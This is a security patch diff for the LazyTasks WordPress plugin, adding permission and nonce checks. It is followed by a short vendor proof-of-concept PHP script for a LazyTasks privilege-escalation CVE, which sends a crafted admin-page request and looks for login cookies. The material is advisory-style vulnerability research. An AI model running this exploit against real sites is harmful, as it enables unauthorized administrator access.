+		$getCurrentUser = $getCurrentUserResponse->get_data();
+		$settings = (object)[];
+		if( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('general-settings', $getCurrentUser['data']['llc_permissions']) ) {
+			$settings = get_option('lazytask_settings', []);
+		}
 		//$currentTimezone = get_option('timezone_string', 'UTC');
 		$timezone_string = get_option('timezone_string');
     	$gmt_offset = get_option('gmt_offset');
@@ -102,7 +122,11 @@

 	public function update_settings(WP_REST_Request $request)
 	{
-
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}

 		$requestData = $request->get_body_params();
 		$settings = isset($requestData['settings']) ? json_decode($requestData['settings'], true) : [];
@@ -167,10 +191,11 @@
 						]);
 					}else{
 						global $wpdb;
+						$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 						$table_name = LAZYTASK_TABLE_PREFIX . 'tasks';

 						// Get all tasks with null serial_no ordered by ID
-						$tasks = $wpdb->get_results(
+						$tasks = $db->get_results(
 							"SELECT id FROM {$table_name}
 							WHERE deleted_at IS NULL
 							ORDER BY id ASC"
@@ -199,7 +224,7 @@
 									WHERE id IN ($ids_list)
 								";

-								$result = $wpdb->query($sql);
+								$result = $db->query($sql);
 							}

 						}
@@ -233,8 +258,13 @@
 		}


+		$errorMessage = '';
 		update_option('lazytask_settings', $settings);
-		Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
+		if(extension_loaded('gd')  && extension_loaded('mbstring')){
+			Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
+		}else{
+			$errorMessage = 'But QR Code generation failed: Required GD or MBString extension is not enabled.';
+		}


 		$getSettings = get_option('lazytask_settings', []);
@@ -244,7 +274,7 @@

 		return new WP_REST_Response([
 			'status'=>200,
-			'message'=>'Settings update successfully',
+			'message'=>'Settings update successfully.'.' '.$errorMessage,
 			'data'=>$getSettings,
 			'requestData'=>$settings,
 			'currentTimezone'=>$current_timezone,
@@ -252,9 +282,14 @@
 		], 200);
 	}

-	public function getLazytaskConfig()
+	public function getLazytaskConfig( WP_REST_Request $request )
 	{
-
+		//permission check
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		$getLazytasksConfig = get_option('lazytasks_config');
 		$lazytask_do_activation_redirect = get_option('lazytask_do_activation_redirect');

@@ -289,6 +324,12 @@

 	public function updateLazytaskConfig( WP_REST_Request $request )
 	{
+		//permission check
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}

 		$requestData = $request->get_json_params();

@@ -390,6 +431,11 @@

 	public function update_portal_settings(WP_REST_Request $request)
 	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		$data = $request->get_json_params();

 		$lazytask_page_id = get_option('lazytask_page_id');
@@ -417,7 +463,6 @@
 		$updated_post = wp_update_post($post_data, true);

 		if (is_wp_error($updated_post)) {
-			error_log('Post Update Error: ' . $updated_post->get_error_message());
 			return new WP_Error('update_failed', $updated_post->get_error_message(), ['status' => 500]);
 		}

@@ -484,6 +529,11 @@

 	public function editLicenseModalStatus(WP_REST_Request $request)
 	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['view-only-access'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		$user_id = $request->get_param('user_id');
 		if (!$user_id) {
 			return new WP_Error('invalid_user', 'User ID is required', ['status' => 400]);
@@ -502,7 +552,13 @@
 	}

 	public function installActivateAddon(WP_REST_Request $request)
-	{
+	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['addon-install'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		$requestData = $request->get_json_params();
 		$addon = isset($requestData['addon']) ? sanitize_text_field($requestData['addon']) : '';

@@ -572,7 +628,6 @@

 		// Download URL
 		$addon_zip_url = esc_url_raw($data['download_url']);
-		error_log('Addon Zip URL: ' . $addon_zip_url); // --- IGNORE ---

 		// Load required WordPress classes
 		require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
@@ -614,6 +669,11 @@

 	public function toggleAddonStatus(WP_REST_Request $request)
 	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['addon-install'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		$requestData = $request->get_json_params();
 		$addon = isset($requestData['addon']) ? sanitize_text_field($requestData['addon']) : '';

@@ -666,6 +726,11 @@

 	public function updateSocialLoginSettings(WP_REST_Request $request)
 	{
+		$userController = new Lazytask_UserController();
+		$permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		$requestData = $request->get_json_params();
 		$social_login_settings = isset($requestData['social_login_settings']) ?
 			(array)$requestData['social_login_settings'] : [];
--- a/lazytasks-project-task-management/src/Controller/Lazytask_TaskController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_TaskController.php
@@ -82,10 +82,10 @@
 		$isSerialEnabled = isset($taskSerialSettings['enabled']) ? $taskSerialSettings['enabled'] : false;
 		$serialStartNumber = isset($taskSerialSettings['number']) ? $taskSerialSettings['number'] : 1;

-		$lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+		$lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
 		if($parent){
-			$lastSubSerial = $wpdb->get_var(
-				$wpdb->prepare(
+			$lastSubSerial = $db->get_var(
+				$db->prepare(
 					"SELECT MAX(serial_no) FROM " . self::TABLE_TASKS . " WHERE parent_id = %d",
 					$parent
 				)
@@ -131,30 +131,32 @@
 		$taskId = $wpdb->insert_id;

 		$mention_users = isset($requestData['mention_users']) && sizeof($requestData['mention_users']) > 0 ? $requestData['mention_users'] : [];
-		$loggedInUser = get_user_by('ID', $createdBy);
-		foreach($mention_users as $mentioned_user){
-			// Prepare data for notification
-			$referenceInfo = [
-				'id' => $id,
-				'name' => $name,
-				'type' => 'mention'
-			];
-
-			$placeholdersArray = [
-				'member_name' => $mentioned_user['name'],
-				'task_name' => $name,
-				'project_name' => '',
-				'creator_name' => $loggedInUser ? $loggedInUser->display_name : '',
-				'description' => $description
-			];
-			// Trigger notification action
-			do_action(
-				'lazytask_task_member_mention',
-				$referenceInfo,
-				['web-app'],
-				[$mentioned_user['id']],
-				$placeholdersArray
-			);
+		$loggedInUser = get_user_by('ID', $createdBy);
+		if ( sizeof( $mention_users ) > 0 ){
+			foreach($mention_users as $mentioned_user){
+				// Prepare data for notification
+				$referenceInfo = [
+					'id' => $taskId,
+					'name' => $name,
+					'type' => 'mention'
+				];
+
+				$placeholdersArray = [
+					'member_name' => $mentioned_user['name'],
+					'task_name' => $name,
+					'project_name' => '',
+					'creator_name' => $loggedInUser ? $loggedInUser->display_name : '',
+					'description' => $description
+				];
+				// Trigger notification action
+				do_action(
+					'lazytask_task_member_mention',
+					$referenceInfo,
+					['web-app'],
+					[$mentioned_user['id']],
+					$placeholdersArray
+				);
+			}
 		}

 		// Insert the task members into the database
@@ -3308,7 +3310,7 @@
 		$updated_by = isset($requestData['updated_by']) && $requestData['updated_by'] != "" ? (int)$requestData['updated_by'] : null;

 		$taskTable = LAZYTASK_TABLE_PREFIX . 'tasks';
-		$lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . $taskTable);
+		$lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . $taskTable);
 		$newSerial = $lastSerial + 1 ;
 		$subtask = $db->get_row($db->prepare("SELECT * FROM {$taskTable} WHERE id = %d",$id));

@@ -3436,10 +3438,10 @@
 		// $copiedName = $task['name'] . ' (Copy)';

 		$baseName = $task['name'];
-		$likePattern = $wpdb->esc_like($baseName . ' (Copy') . '%';
+		$likePattern = $db->esc_like($baseName . ' (Copy') . '%';

-		$existingNames = $wpdb->get_col(
-			$wpdb->prepare(
+		$existingNames = $db->get_col(
+			$db->prepare(
 				"SELECT name FROM {$wpdb->prefix}pms_tasks WHERE name LIKE %s AND project_id = %d",
 				$likePattern,
 				$task['project_id']
@@ -3468,7 +3470,7 @@

 		// Get new sort order
 		$sortOrder = $this->getMaxSortOrderBySectionId($task['task_section_id'], $task['project_id'], $task['parent_id']);
-		$lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+		$lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
 		$newSerial = ($task['parent_id'] ? null : ($lastSerial ? $lastSerial + 1 : 1));

 		// Insert copied task
@@ -3554,7 +3556,7 @@
 			$copiedSubtaskName = $subtask['name'] . ' (Copy)';
 			$copiedSubtaskSlug = Lazytask_SlugGenerator::slug($copiedSubtaskName, self::TABLE_TASKS, 'slug');
 			$subtaskSortOrder = $this->getMaxSortOrderBySectionId($subtask['section_id'], $subtask['project_id'], $newTaskId);
-			$lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+			$lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
 			$newSerial = ($lastSerial ? $lastSerial + 1 : 1);

 			// Insert copied subtask
@@ -3727,7 +3729,7 @@

 		// Prepare and insert new section
 		$tableTaskSection = LAZYTASK_TABLE_PREFIX . 'task_sections';
-		$lastSerial = $wpdb->get_var($wpdb->prepare(
+		$lastSerial = $db->get_var($db->prepare(
 			"SELECT MAX(sort_order) FROM {$tableTaskSection} WHERE project_id = %d",
 			$taskSection['project_id']
 		));
@@ -3765,7 +3767,7 @@
 		];

 		// Get and duplicate tasks in the original section
-		$originalTasks = $db->get_results($wpdb->prepare(
+		$originalTasks = $db->get_results($db->prepare(
 			"SELECT * FROM " . self::TABLE_TASKS . " WHERE section_id = %d AND parent_id IS NULL",
 			$id
 		), ARRAY_A);
@@ -3808,7 +3810,7 @@
 		$db->query('START TRANSACTION');

 		$sortOrder = $this->getMaxSortOrderBySectionId($sectionId, $task['project_id'], null);
-		$lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+		$lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
 		$newSerial = $lastSerial ? $lastSerial + 1 : 1;

 		$newTaskData = [
@@ -3885,7 +3887,7 @@
 		foreach ($subtasks as $subtask) {
 			$subSlug = Lazytask_SlugGenerator::slug($subtask['name'] . ' (Copy)', self::TABLE_TASKS, 'slug');
 			$subSortOrder = $this->getMaxSortOrderBySectionId($subtask['section_id'], $subtask['project_id'], $newTaskId);
-			$newSubSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS) + 1;
+			$newSubSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS) + 1;

 			$subtaskData = [
 				"serial_no" => $newSubSerial,
@@ -4529,8 +4531,8 @@
 		$returnArray = [];
 		if (!empty($allResults)) {
 			foreach ($allResults as $row) {
-				$created_at_formatted = $row['created_at'] ? date('d F Y H:i', strtotime($row['created_at'])) : null;
-    			$updated_at_formatted = $row['updated_at'] ? date('d F Y H:i', strtotime($row['updated_at'])) : null;
+				$created_at_formatted = $row['created_at'] ? gmdate('d F Y H:i', strtotime($row['created_at'])) : null;
+    			$updated_at_formatted = $row['updated_at'] ? gmdate('d F Y H:i', strtotime($row['updated_at'])) : null;

 				$returnArray[] = [
 					'id'           => $row['id'],
@@ -5399,7 +5401,7 @@
 			$projectsData[] = [
 				'project_id'   => (int)$proj->project_id,
 				'project_name' => $proj->project_name,
-				'color'        => $colorPalette[$i] ?? sprintf("#%06X", mt_rand(0, 0xFFFFFF)),
+				'color'        => $colorPalette[$i] ?? sprintf("#%06X", wp_rand(0, 0xFFFFFF)),

 				// Absolute numbers
 				'total_tasks'      => (int)$proj->total_tasks,
@@ -6144,10 +6146,10 @@
 		$defaultDuration = 1;
 		$isMissing = empty($start_date) || empty($end_date);

-		$stDate = empty($start_date) && !empty($end_date) && date('Y-m-d', strtotime( $end_date ) ) < date('Y-m-d') ? date('Y-m-d', strtotime( $end_date ) ): date('Y-m-d');
+		$stDate = empty($start_date) && !empty($end_date) && gmdate('Y-m-d', strtotime( $end_date ) ) < gmdate('Y-m-d') ? gmdate('Y-m-d', strtotime( $end_date ) ): gmdate('Y-m-d');

-		$startDate = !empty($start_date) ? date('Y-m-d H:i', strtotime( $start_date. ' 00:00' ) ) : date('Y-m-d H:i', strtotime( $stDate . ' 00:00' ) );
-		$endDate = !empty($end_date) ? date('Y-m-d H:i', strtotime( $end_date. ' 23:59' ) ) : date('Y-m-d H:i', strtotime( $today->format('Y-m-d') . ' 23:59' ) );
+		$startDate = !empty($start_date) ? gmdate('Y-m-d H:i', strtotime( $start_date. ' 00:00' ) ) : gmdate('Y-m-d H:i', strtotime( $stDate . ' 00:00' ) );
+		$endDate = !empty($end_date) ? gmdate('Y-m-d H:i', strtotime( $end_date. ' 23:59' ) ) : gmdate('Y-m-d H:i', strtotime( $today->format('Y-m-d') . ' 23:59' ) );

 		/*if ($startDate && $endDate && $startDate == $endDate) {
 			// If start and end date are the same, set the end date to one day later
--- a/lazytasks-project-task-management/src/Controller/Lazytask_UserController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_UserController.php
@@ -392,6 +392,7 @@
 				'llc_permissions' => isset($roles['permissions']) && sizeof($roles['permissions'])>0 ? array_unique($this->array_flatten( $roles['permissions'])) : [],
 			),
 		);
+
 		//add user meta data for apps development fcm token after login
 		$lazytask_fcm_token = $request->get_param('lazytask_fcm_token');
 		if($lazytask_fcm_token != ''){
@@ -402,9 +403,11 @@
 			$this->update_user_status($user->ID, 1);
 		}

+		$nonce = wp_create_nonce('wp_rest');
+
 		$token =  JWT::encode($token, $secret_key, 'HS256');

-		return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token));
+		return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token, 'nonce' => $nonce));
 	}

    private	function update_user_status($user_id, $status)
@@ -507,9 +510,10 @@
 			$this->update_user_status($user->ID, 1);
 		}

+		$nonce = wp_create_nonce('wp_rest');
 		$token =  JWT::encode($token, $secret_key, 'HS256');

-		return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token));
+		return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token, 'nonce' => $nonce));
 	}

 // Function to generate JWT token
@@ -527,6 +531,11 @@
 			);
 		}

+		$nonce = $request->get_header('X-WP-Nonce');
+		if (!$nonce || !wp_verify_nonce($nonce, 'wp_rest')) {
+			return new WP_Error('invalid_nonce', 'Nonce verification failed', ['status' => 403]);
+		}
+
 		/*
 		 * Extract the authorization header
 		 */
@@ -730,6 +739,7 @@
 		delete_user_meta($user_id, 'lazytask_fcm_token');

 		wp_clear_auth_cookie();
+		wp_set_current_user(0);

 		return new WP_REST_Response([
 			'status'  => 200,
@@ -850,6 +860,24 @@
 		return true;
 	}

+	//get current logged in user information by JWT token
+	public function lazytask_get_current_logged_user(WP_REST_Request $request)
+	{
+		$response = $this->validate_token($request);
+		if (is_wp_error($response)) {
+			return $response;
+		}
+		$user_id = $response['data']['token']->data->user_id;
+		$user = $this->getUserById($user_id);
+
+		if($user && sizeof($user)>0){
+			return new WP_REST_Response(['status'=>200, 'data'=>$user]);
+		}
+
+		return new WP_REST_Response(['status'=>404, 'data'=>[]]);
+	}
+
+
   public function admin_after_auth_login () {

 	  $secret_key = defined( 'LAZYTASK_JWT_SECRET_KEY' ) ? LAZYTASK_JWT_SECRET_KEY : false;
@@ -884,9 +912,11 @@
 		  ),
 	  );

+	  $nonce = wp_create_nonce('wp_rest');
+
 	  $token =  JWT::encode($token, $secret_key, 'HS256');

-	  return new WP_REST_Response(array('token' => $token, 'user'=>$user));
+	  return new WP_REST_Response(array('token' => $token, 'user'=>$user, 'nonce' => $nonce), 200);
 	}

    private function array_unique_by_key(array $array, string $key): array {
@@ -901,6 +931,10 @@
 	}

 	public function createLazyLinkRole(WP_REST_Request $request) {
+		$permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$rolesTable = LAZYTASK_TABLE_PREFIX . 'roles';
@@ -953,6 +987,11 @@

 	public function updateLazyLinkRole(WP_REST_Request $request)
 	{
+		$permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$rolesTable = LAZYTASK_TABLE_PREFIX . 'roles';
@@ -1002,6 +1041,10 @@

 	public function deleteLazyLinkRole(WP_REST_Request $request)
 	{
+		$permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$rolesTable = LAZYTASK_TABLE_PREFIX . 'roles';
@@ -1165,6 +1208,12 @@
 	}

 	public function updateRolePermissions(WP_REST_Request $request) {
+
+		$permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
+
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);

@@ -1250,6 +1299,10 @@
 	}

 	public function signUp(WP_REST_Request $request) {
+		$permissionCheck = $this->permission_check( $request, ['add-member-to-project-send-invite', 'manage-users'] );
+		if ( is_wp_error( $permissionCheck ) ) {
+			return $permissionCheck;
+		}
 		global $wpdb;
 		$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
 		$response = array();
@@ -1345,105 +1398,134 @@
 		if(!$id){
 			return array('status'=> 500, 'message' => 'User ID is required', 'data'=>[]);
 		}
-		$username = sanitize_text_field($parameters['email']);
-		$firstName = sanitize_text_field($parameters['firstName']);
-		$lastName = sanitize_text_field($parameters['lastName']);
-		$phoneNumber = sanitize_text_field($parameters['phoneNumber']);
-		$roles = isset($parameters['roles']) && $parameters['roles']!='' ? json_decode($parameters['roles'], true) : [];
-		$email = sanitize_text_field($parameters['email']);
+		//check id and getCurrentUserId match or logged in user is admin or super admin
+		$getCurrentUserResponse = $this->lazytask_get_current_logged_user($request);
+		if (is_wp_error($getCurrentUserResponse)) {
+			return $getCurrentUserResponse;
+		}
+
+		$statusCode = $getCurrentUserResponse->get_status();
+		if($statusCode != 200){
+			return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+		}
+
+		$getCurrentUser = $getCurrentUserResponse->get_data();
+		if( ( isset($getCurrentUser['data']['id']) && $id == $getCurrentUser['data']['id'] ) || ( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('manage-users', $getCurrentUser['data']['llc_permissions']) ) ){
+			$username = isset($parameters['email']) ? sanitize_text_field($parameters['email']) : '';
+			$firstName = sanitize_text_field($parameters['firstName']);
+			$lastName = sanitize_text_field($parameters['lastName']);
+			$phoneNumber = sanitize_text_field($parameters['phoneNumber']);
+			$roles = isset($parameters['roles']) && $parameters['roles']!='' ? json_decode($parameters['roles'], true) : [];
+
+			$email = sanitize_text_field($parameters['email']);
 //		$password = isset($parameters['password']) && $parameters['password']!=''? sanitize_text_field($parameters['password']): '123456';
-		// $role = sanitize_text_field($parameters['role']);
-		$error = new WP_Error();
-		if (empty($username)) {
-			$error->add(400, __("Username field 'username' is required.", 'lazytasks-project-task-management'), array('status' => 400));
-			return $error;
-		}
-		if (empty($email)) {
-			$error->add(401, __("Email field 'email' is required.", 'lazytasks-project-task-management'), array('status' => 400));
-			return $error;
-		}
+			// $role = sanitize_text_field($parameters['role']);
+			$error = new WP_Error();
+			if (empty($username)) {
+				$error->add(400, __("Username field 'username' is required.", 'lazytasks-project-task-management'), array('status' => 400));
+				return $error;
+			}
+			if (empty($email)) {
+				$error->add(401, __("Email field 'email' is required.", 'lazytasks-project-task-management'), array('status' => 400));
+				return $error;
+			}

-		$nickname= '';
-		if($firstName){
-			$nickname .= strtolower($firstName);
-		}
-		if($lastName){
-			$nickname .= '-';
-			$nickname .= strtolower($lastName);
-		}
-		$user_id = username_exists($username);
-		$userIdByEmail = email_exists($email);
+			$nickname= '';
+			if($firstName){
+				$nickname .= strtolower($firstName);
+			}
+			if($lastName){
+				$nickname .= '-';
+				$nickname .= strtolower($lastName);
+			}
+			$user_id = username_exists($username);
+			$userIdByEmail = email_exists($email);

-		if ((!$user_id ||  $user_id==$id) && (!$userIdByEmail ||  $userIdByEmail==$id)) {
-			$db->query('START TRANSACTION');
+			if ((!$user_id ||  $user_id==$id) && (!$userIdByEmail ||  $userIdByEmail==$id)) {
+				$db->query('START TRANSACTION');

-			$args = array (
-				'ID'     => (int)$id,
-				'user_login'     => $username,
-				'user_email'     => $email,
-				'user_nicename'       => $nickname,
-				'display_name'   => $firstName . ' ' . $lastName,
-			);
-			$userId = wp_update_user($args);
+				$args = array (
+					'ID'     => (int)$id,
+					/*'user_login'     => $username,
+					'user_email'     => $email,*/
+					'user_nicename'       => $nickname,
+					'display_name'   => $firstName . ' ' . $lastName,
+				);
+				if ( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('manage-users', $getCurrentUser['data']['llc_permissions']) ){
+					$args['user_login'] = $username;
+					$args['user_email'] = $email;
+				}
+				$userId = wp_update_user($args);

-			if (!is_wp_error($userId)) {
-				$user = get_user_by('ID', $userId);
+				if (!is_wp_error($userId)) {
+//					$user = get_user_by('ID', $userId);

-				update_user_meta($userId, 'first_name', $firstName);
-				update_user_meta($userId, 'last_name', $lastName);
+					update_user_meta($userId, 'first_name', $firstName);
+					update_user_meta($userId, 'last_name', $lastName);

-				update_user_meta($userId, 'phone_number', $phoneNumber);
-				if($roles){
-					update_user_meta($userId, 'lazytasks_capabilities', $roles);
+					update_user_meta($userId, 'phone_number', $phoneNumber);
+					if($roles && ( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('manage-users', $getCurrentUser['data']['llc_permissions']) )){
+						update_user_meta($userId, 'lazytasks_capabilities', $roles);

-					$this->addUserRole($userId, $roles);
-				}
+						$this->addUserRole($userId, $roles);
+					}

-				// Handle file upload
-				$requestFile = $request->get_file_params();
-				if (isset($requestFile['file']) && $requestFile['file']) {
-					require_once(ABSPATH . 'wp-admin/includes/file.php');
-					$uploadedfile = $requestFile['file'];
-					$upload_overrides = array('test_form' => false);
-
-					$moveFile = wp_handle_upload($uploadedfile, $upload_overrides);
-
-					if($moveFile){
-						$attachment = array(
-							'post_author' => $userId,
-							'post_title' => $uploadedfile['name'],
-							'post_content' => '',
-							'post_status' => 'inherit',
-							'post_mime_type' => image_type_to_mime_type(exif_imagetype($moveFile['file']))
-						);
-
-						$attachment_id = wp_insert_attachment($attachment, $moveFile['file']);
-
-						require_once(ABSPATH . 'wp-admin/includes/image.php');
-						$attach_data = wp_generate_attachment_metadata($attachment_id, $moveFile['file']);
-						wp_update_attachment_metadata($attachment_id, $attach_data);
+					// Handle file upload
+					$requestFile = $request->get_file_params();
+					if (isset($requestFile['file']) && $requestFile['file']) {
+						require_once(ABSPATH . 'wp-admin/includes/file.php');
+						$uploadedfile = $requestFile['file'];
+						$upload_overrides = array('test_form' => false);
+
+						$moveFile = wp_handle_upload($uploadedfile, $upload_overrides);
+
+						if($moveFile){
+							$attachment = array(
+								'post_author' => $userId,
+								'post_title' => $uploadedfile['name'],
+								'post_content' => '',
+								'post_status' => 'inherit',
+								'post_mime_type' => image_type_to_mime_type(exif_imagetype($moveFile['file']))
+							);
+
+							$attachment_id = wp_insert_attachment($attachment, $moveFile['file']);
+
+							require_once(ABSPATH . 'wp-admin/includes/image.php');
+							$attach_data = wp_generate_attachment_metadata($attachment_id, $moveFile['file']);
+							wp_update_attachment_metadata($attachment_id, $attach_data);

-						update_user_meta($userId, 'profile_photo', $moveFile['url']);
-						update_user_meta($userId, 'profile_photo_id', $attachment_id);
+							update_user_meta($userId, 'profile_photo', $moveFile['url']);
+							update_user_meta($userId, 'profile_photo_id', $attachment_id);

+						}
 					}
-				}


-				$db->query('COMMIT');
+					$db->query('COMMIT');

-				$user = $this->getUserById($id);
+					$user = $this->getUserById($id);

 					if($user && sizeof($user)>0){
 						return new WP_REST_Response(['status'=>200, 'message'=>'Update has been Successfully', 'data'=>$user]);
 					}
 					return new WP_REST_Response(['status'=>404, 'message'=>__("User not found", "lazytasks-project-task-management")]);
 				}
+
+				return new WP_REST_Response(['status'=>500, 'message'=>__("User Update Failed", "lazytasks-project-task-management")]);
+
 			}
-			return new WP_REST_Response(['status'=>500, 'message'=>__("User Update Failed", "lazytasks-project-task-management")]);
+			//username or email already exists
+			return new WP_REST_Response(['status'=>409, 'message'=>__("User already exists", "lazytasks-project-task-management")]);
+		}
+		return new WP_REST_Response(['status'=>403, 'message'=>'Unauthorized', 'data'=>[]], 403);
+
 		}

 		public function userRoleUpdate(WP_REST_Request $request) {
+			$permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+			if ( is_wp_error( $permissionCheck ) 

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68869 - LazyTasks <= 1.2.37 - Unauthenticated Privilege Escalation

<?php

$target_url = "http://target-site.com/wp-admin/index.php"; // Change this to the target WordPress admin URL

// The exploit triggers by loading any admin page with the 'page' parameter containing 'lazytasks-page'
$exploit_url = $target_url . "?page=lazytasks-page-exploit";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true); // Capture headers to check for Set-Cookie (session)
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Atomic Edge PoC)');

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check response
if ($http_code == 200) {
    echo "[+] Request sent successfully to: $exploit_urln";
    echo "[+] HTTP Status Code: $http_coden";
    
    // Look for WordPress authentication cookies in the response headers
    if (strpos($response, 'wordpress_logged_in_') !== false) {
        echo "[!] POTENTIAL SUCCESS: WordPress authentication cookies detected in response.n";
        echo "    This may indicate successful privilege escalation.n";
        echo "    Verify by attempting to access /wp-admin/ with the received cookies.n";
    } else {
        echo "[-] No obvious authentication cookies found in response.n";
        echo "    The vulnerability may still be triggered but not visible in headers.n";
        echo "    Check the target site for new admin users or unexpected admin sessions.n";
    }
    
    // The vulnerability triggers the admin_after_auth_login() function which may
    // create an admin session or user. Further verification would require
    // attempting to access a privileged admin page with the same session.
    
} else {
    echo "[-] Request failed or returned unexpected status code: $http_coden";
}

// Note: This PoC demonstrates the trigger mechanism. Full verification requires
// checking for newly created admin users or successful admin panel access.

?>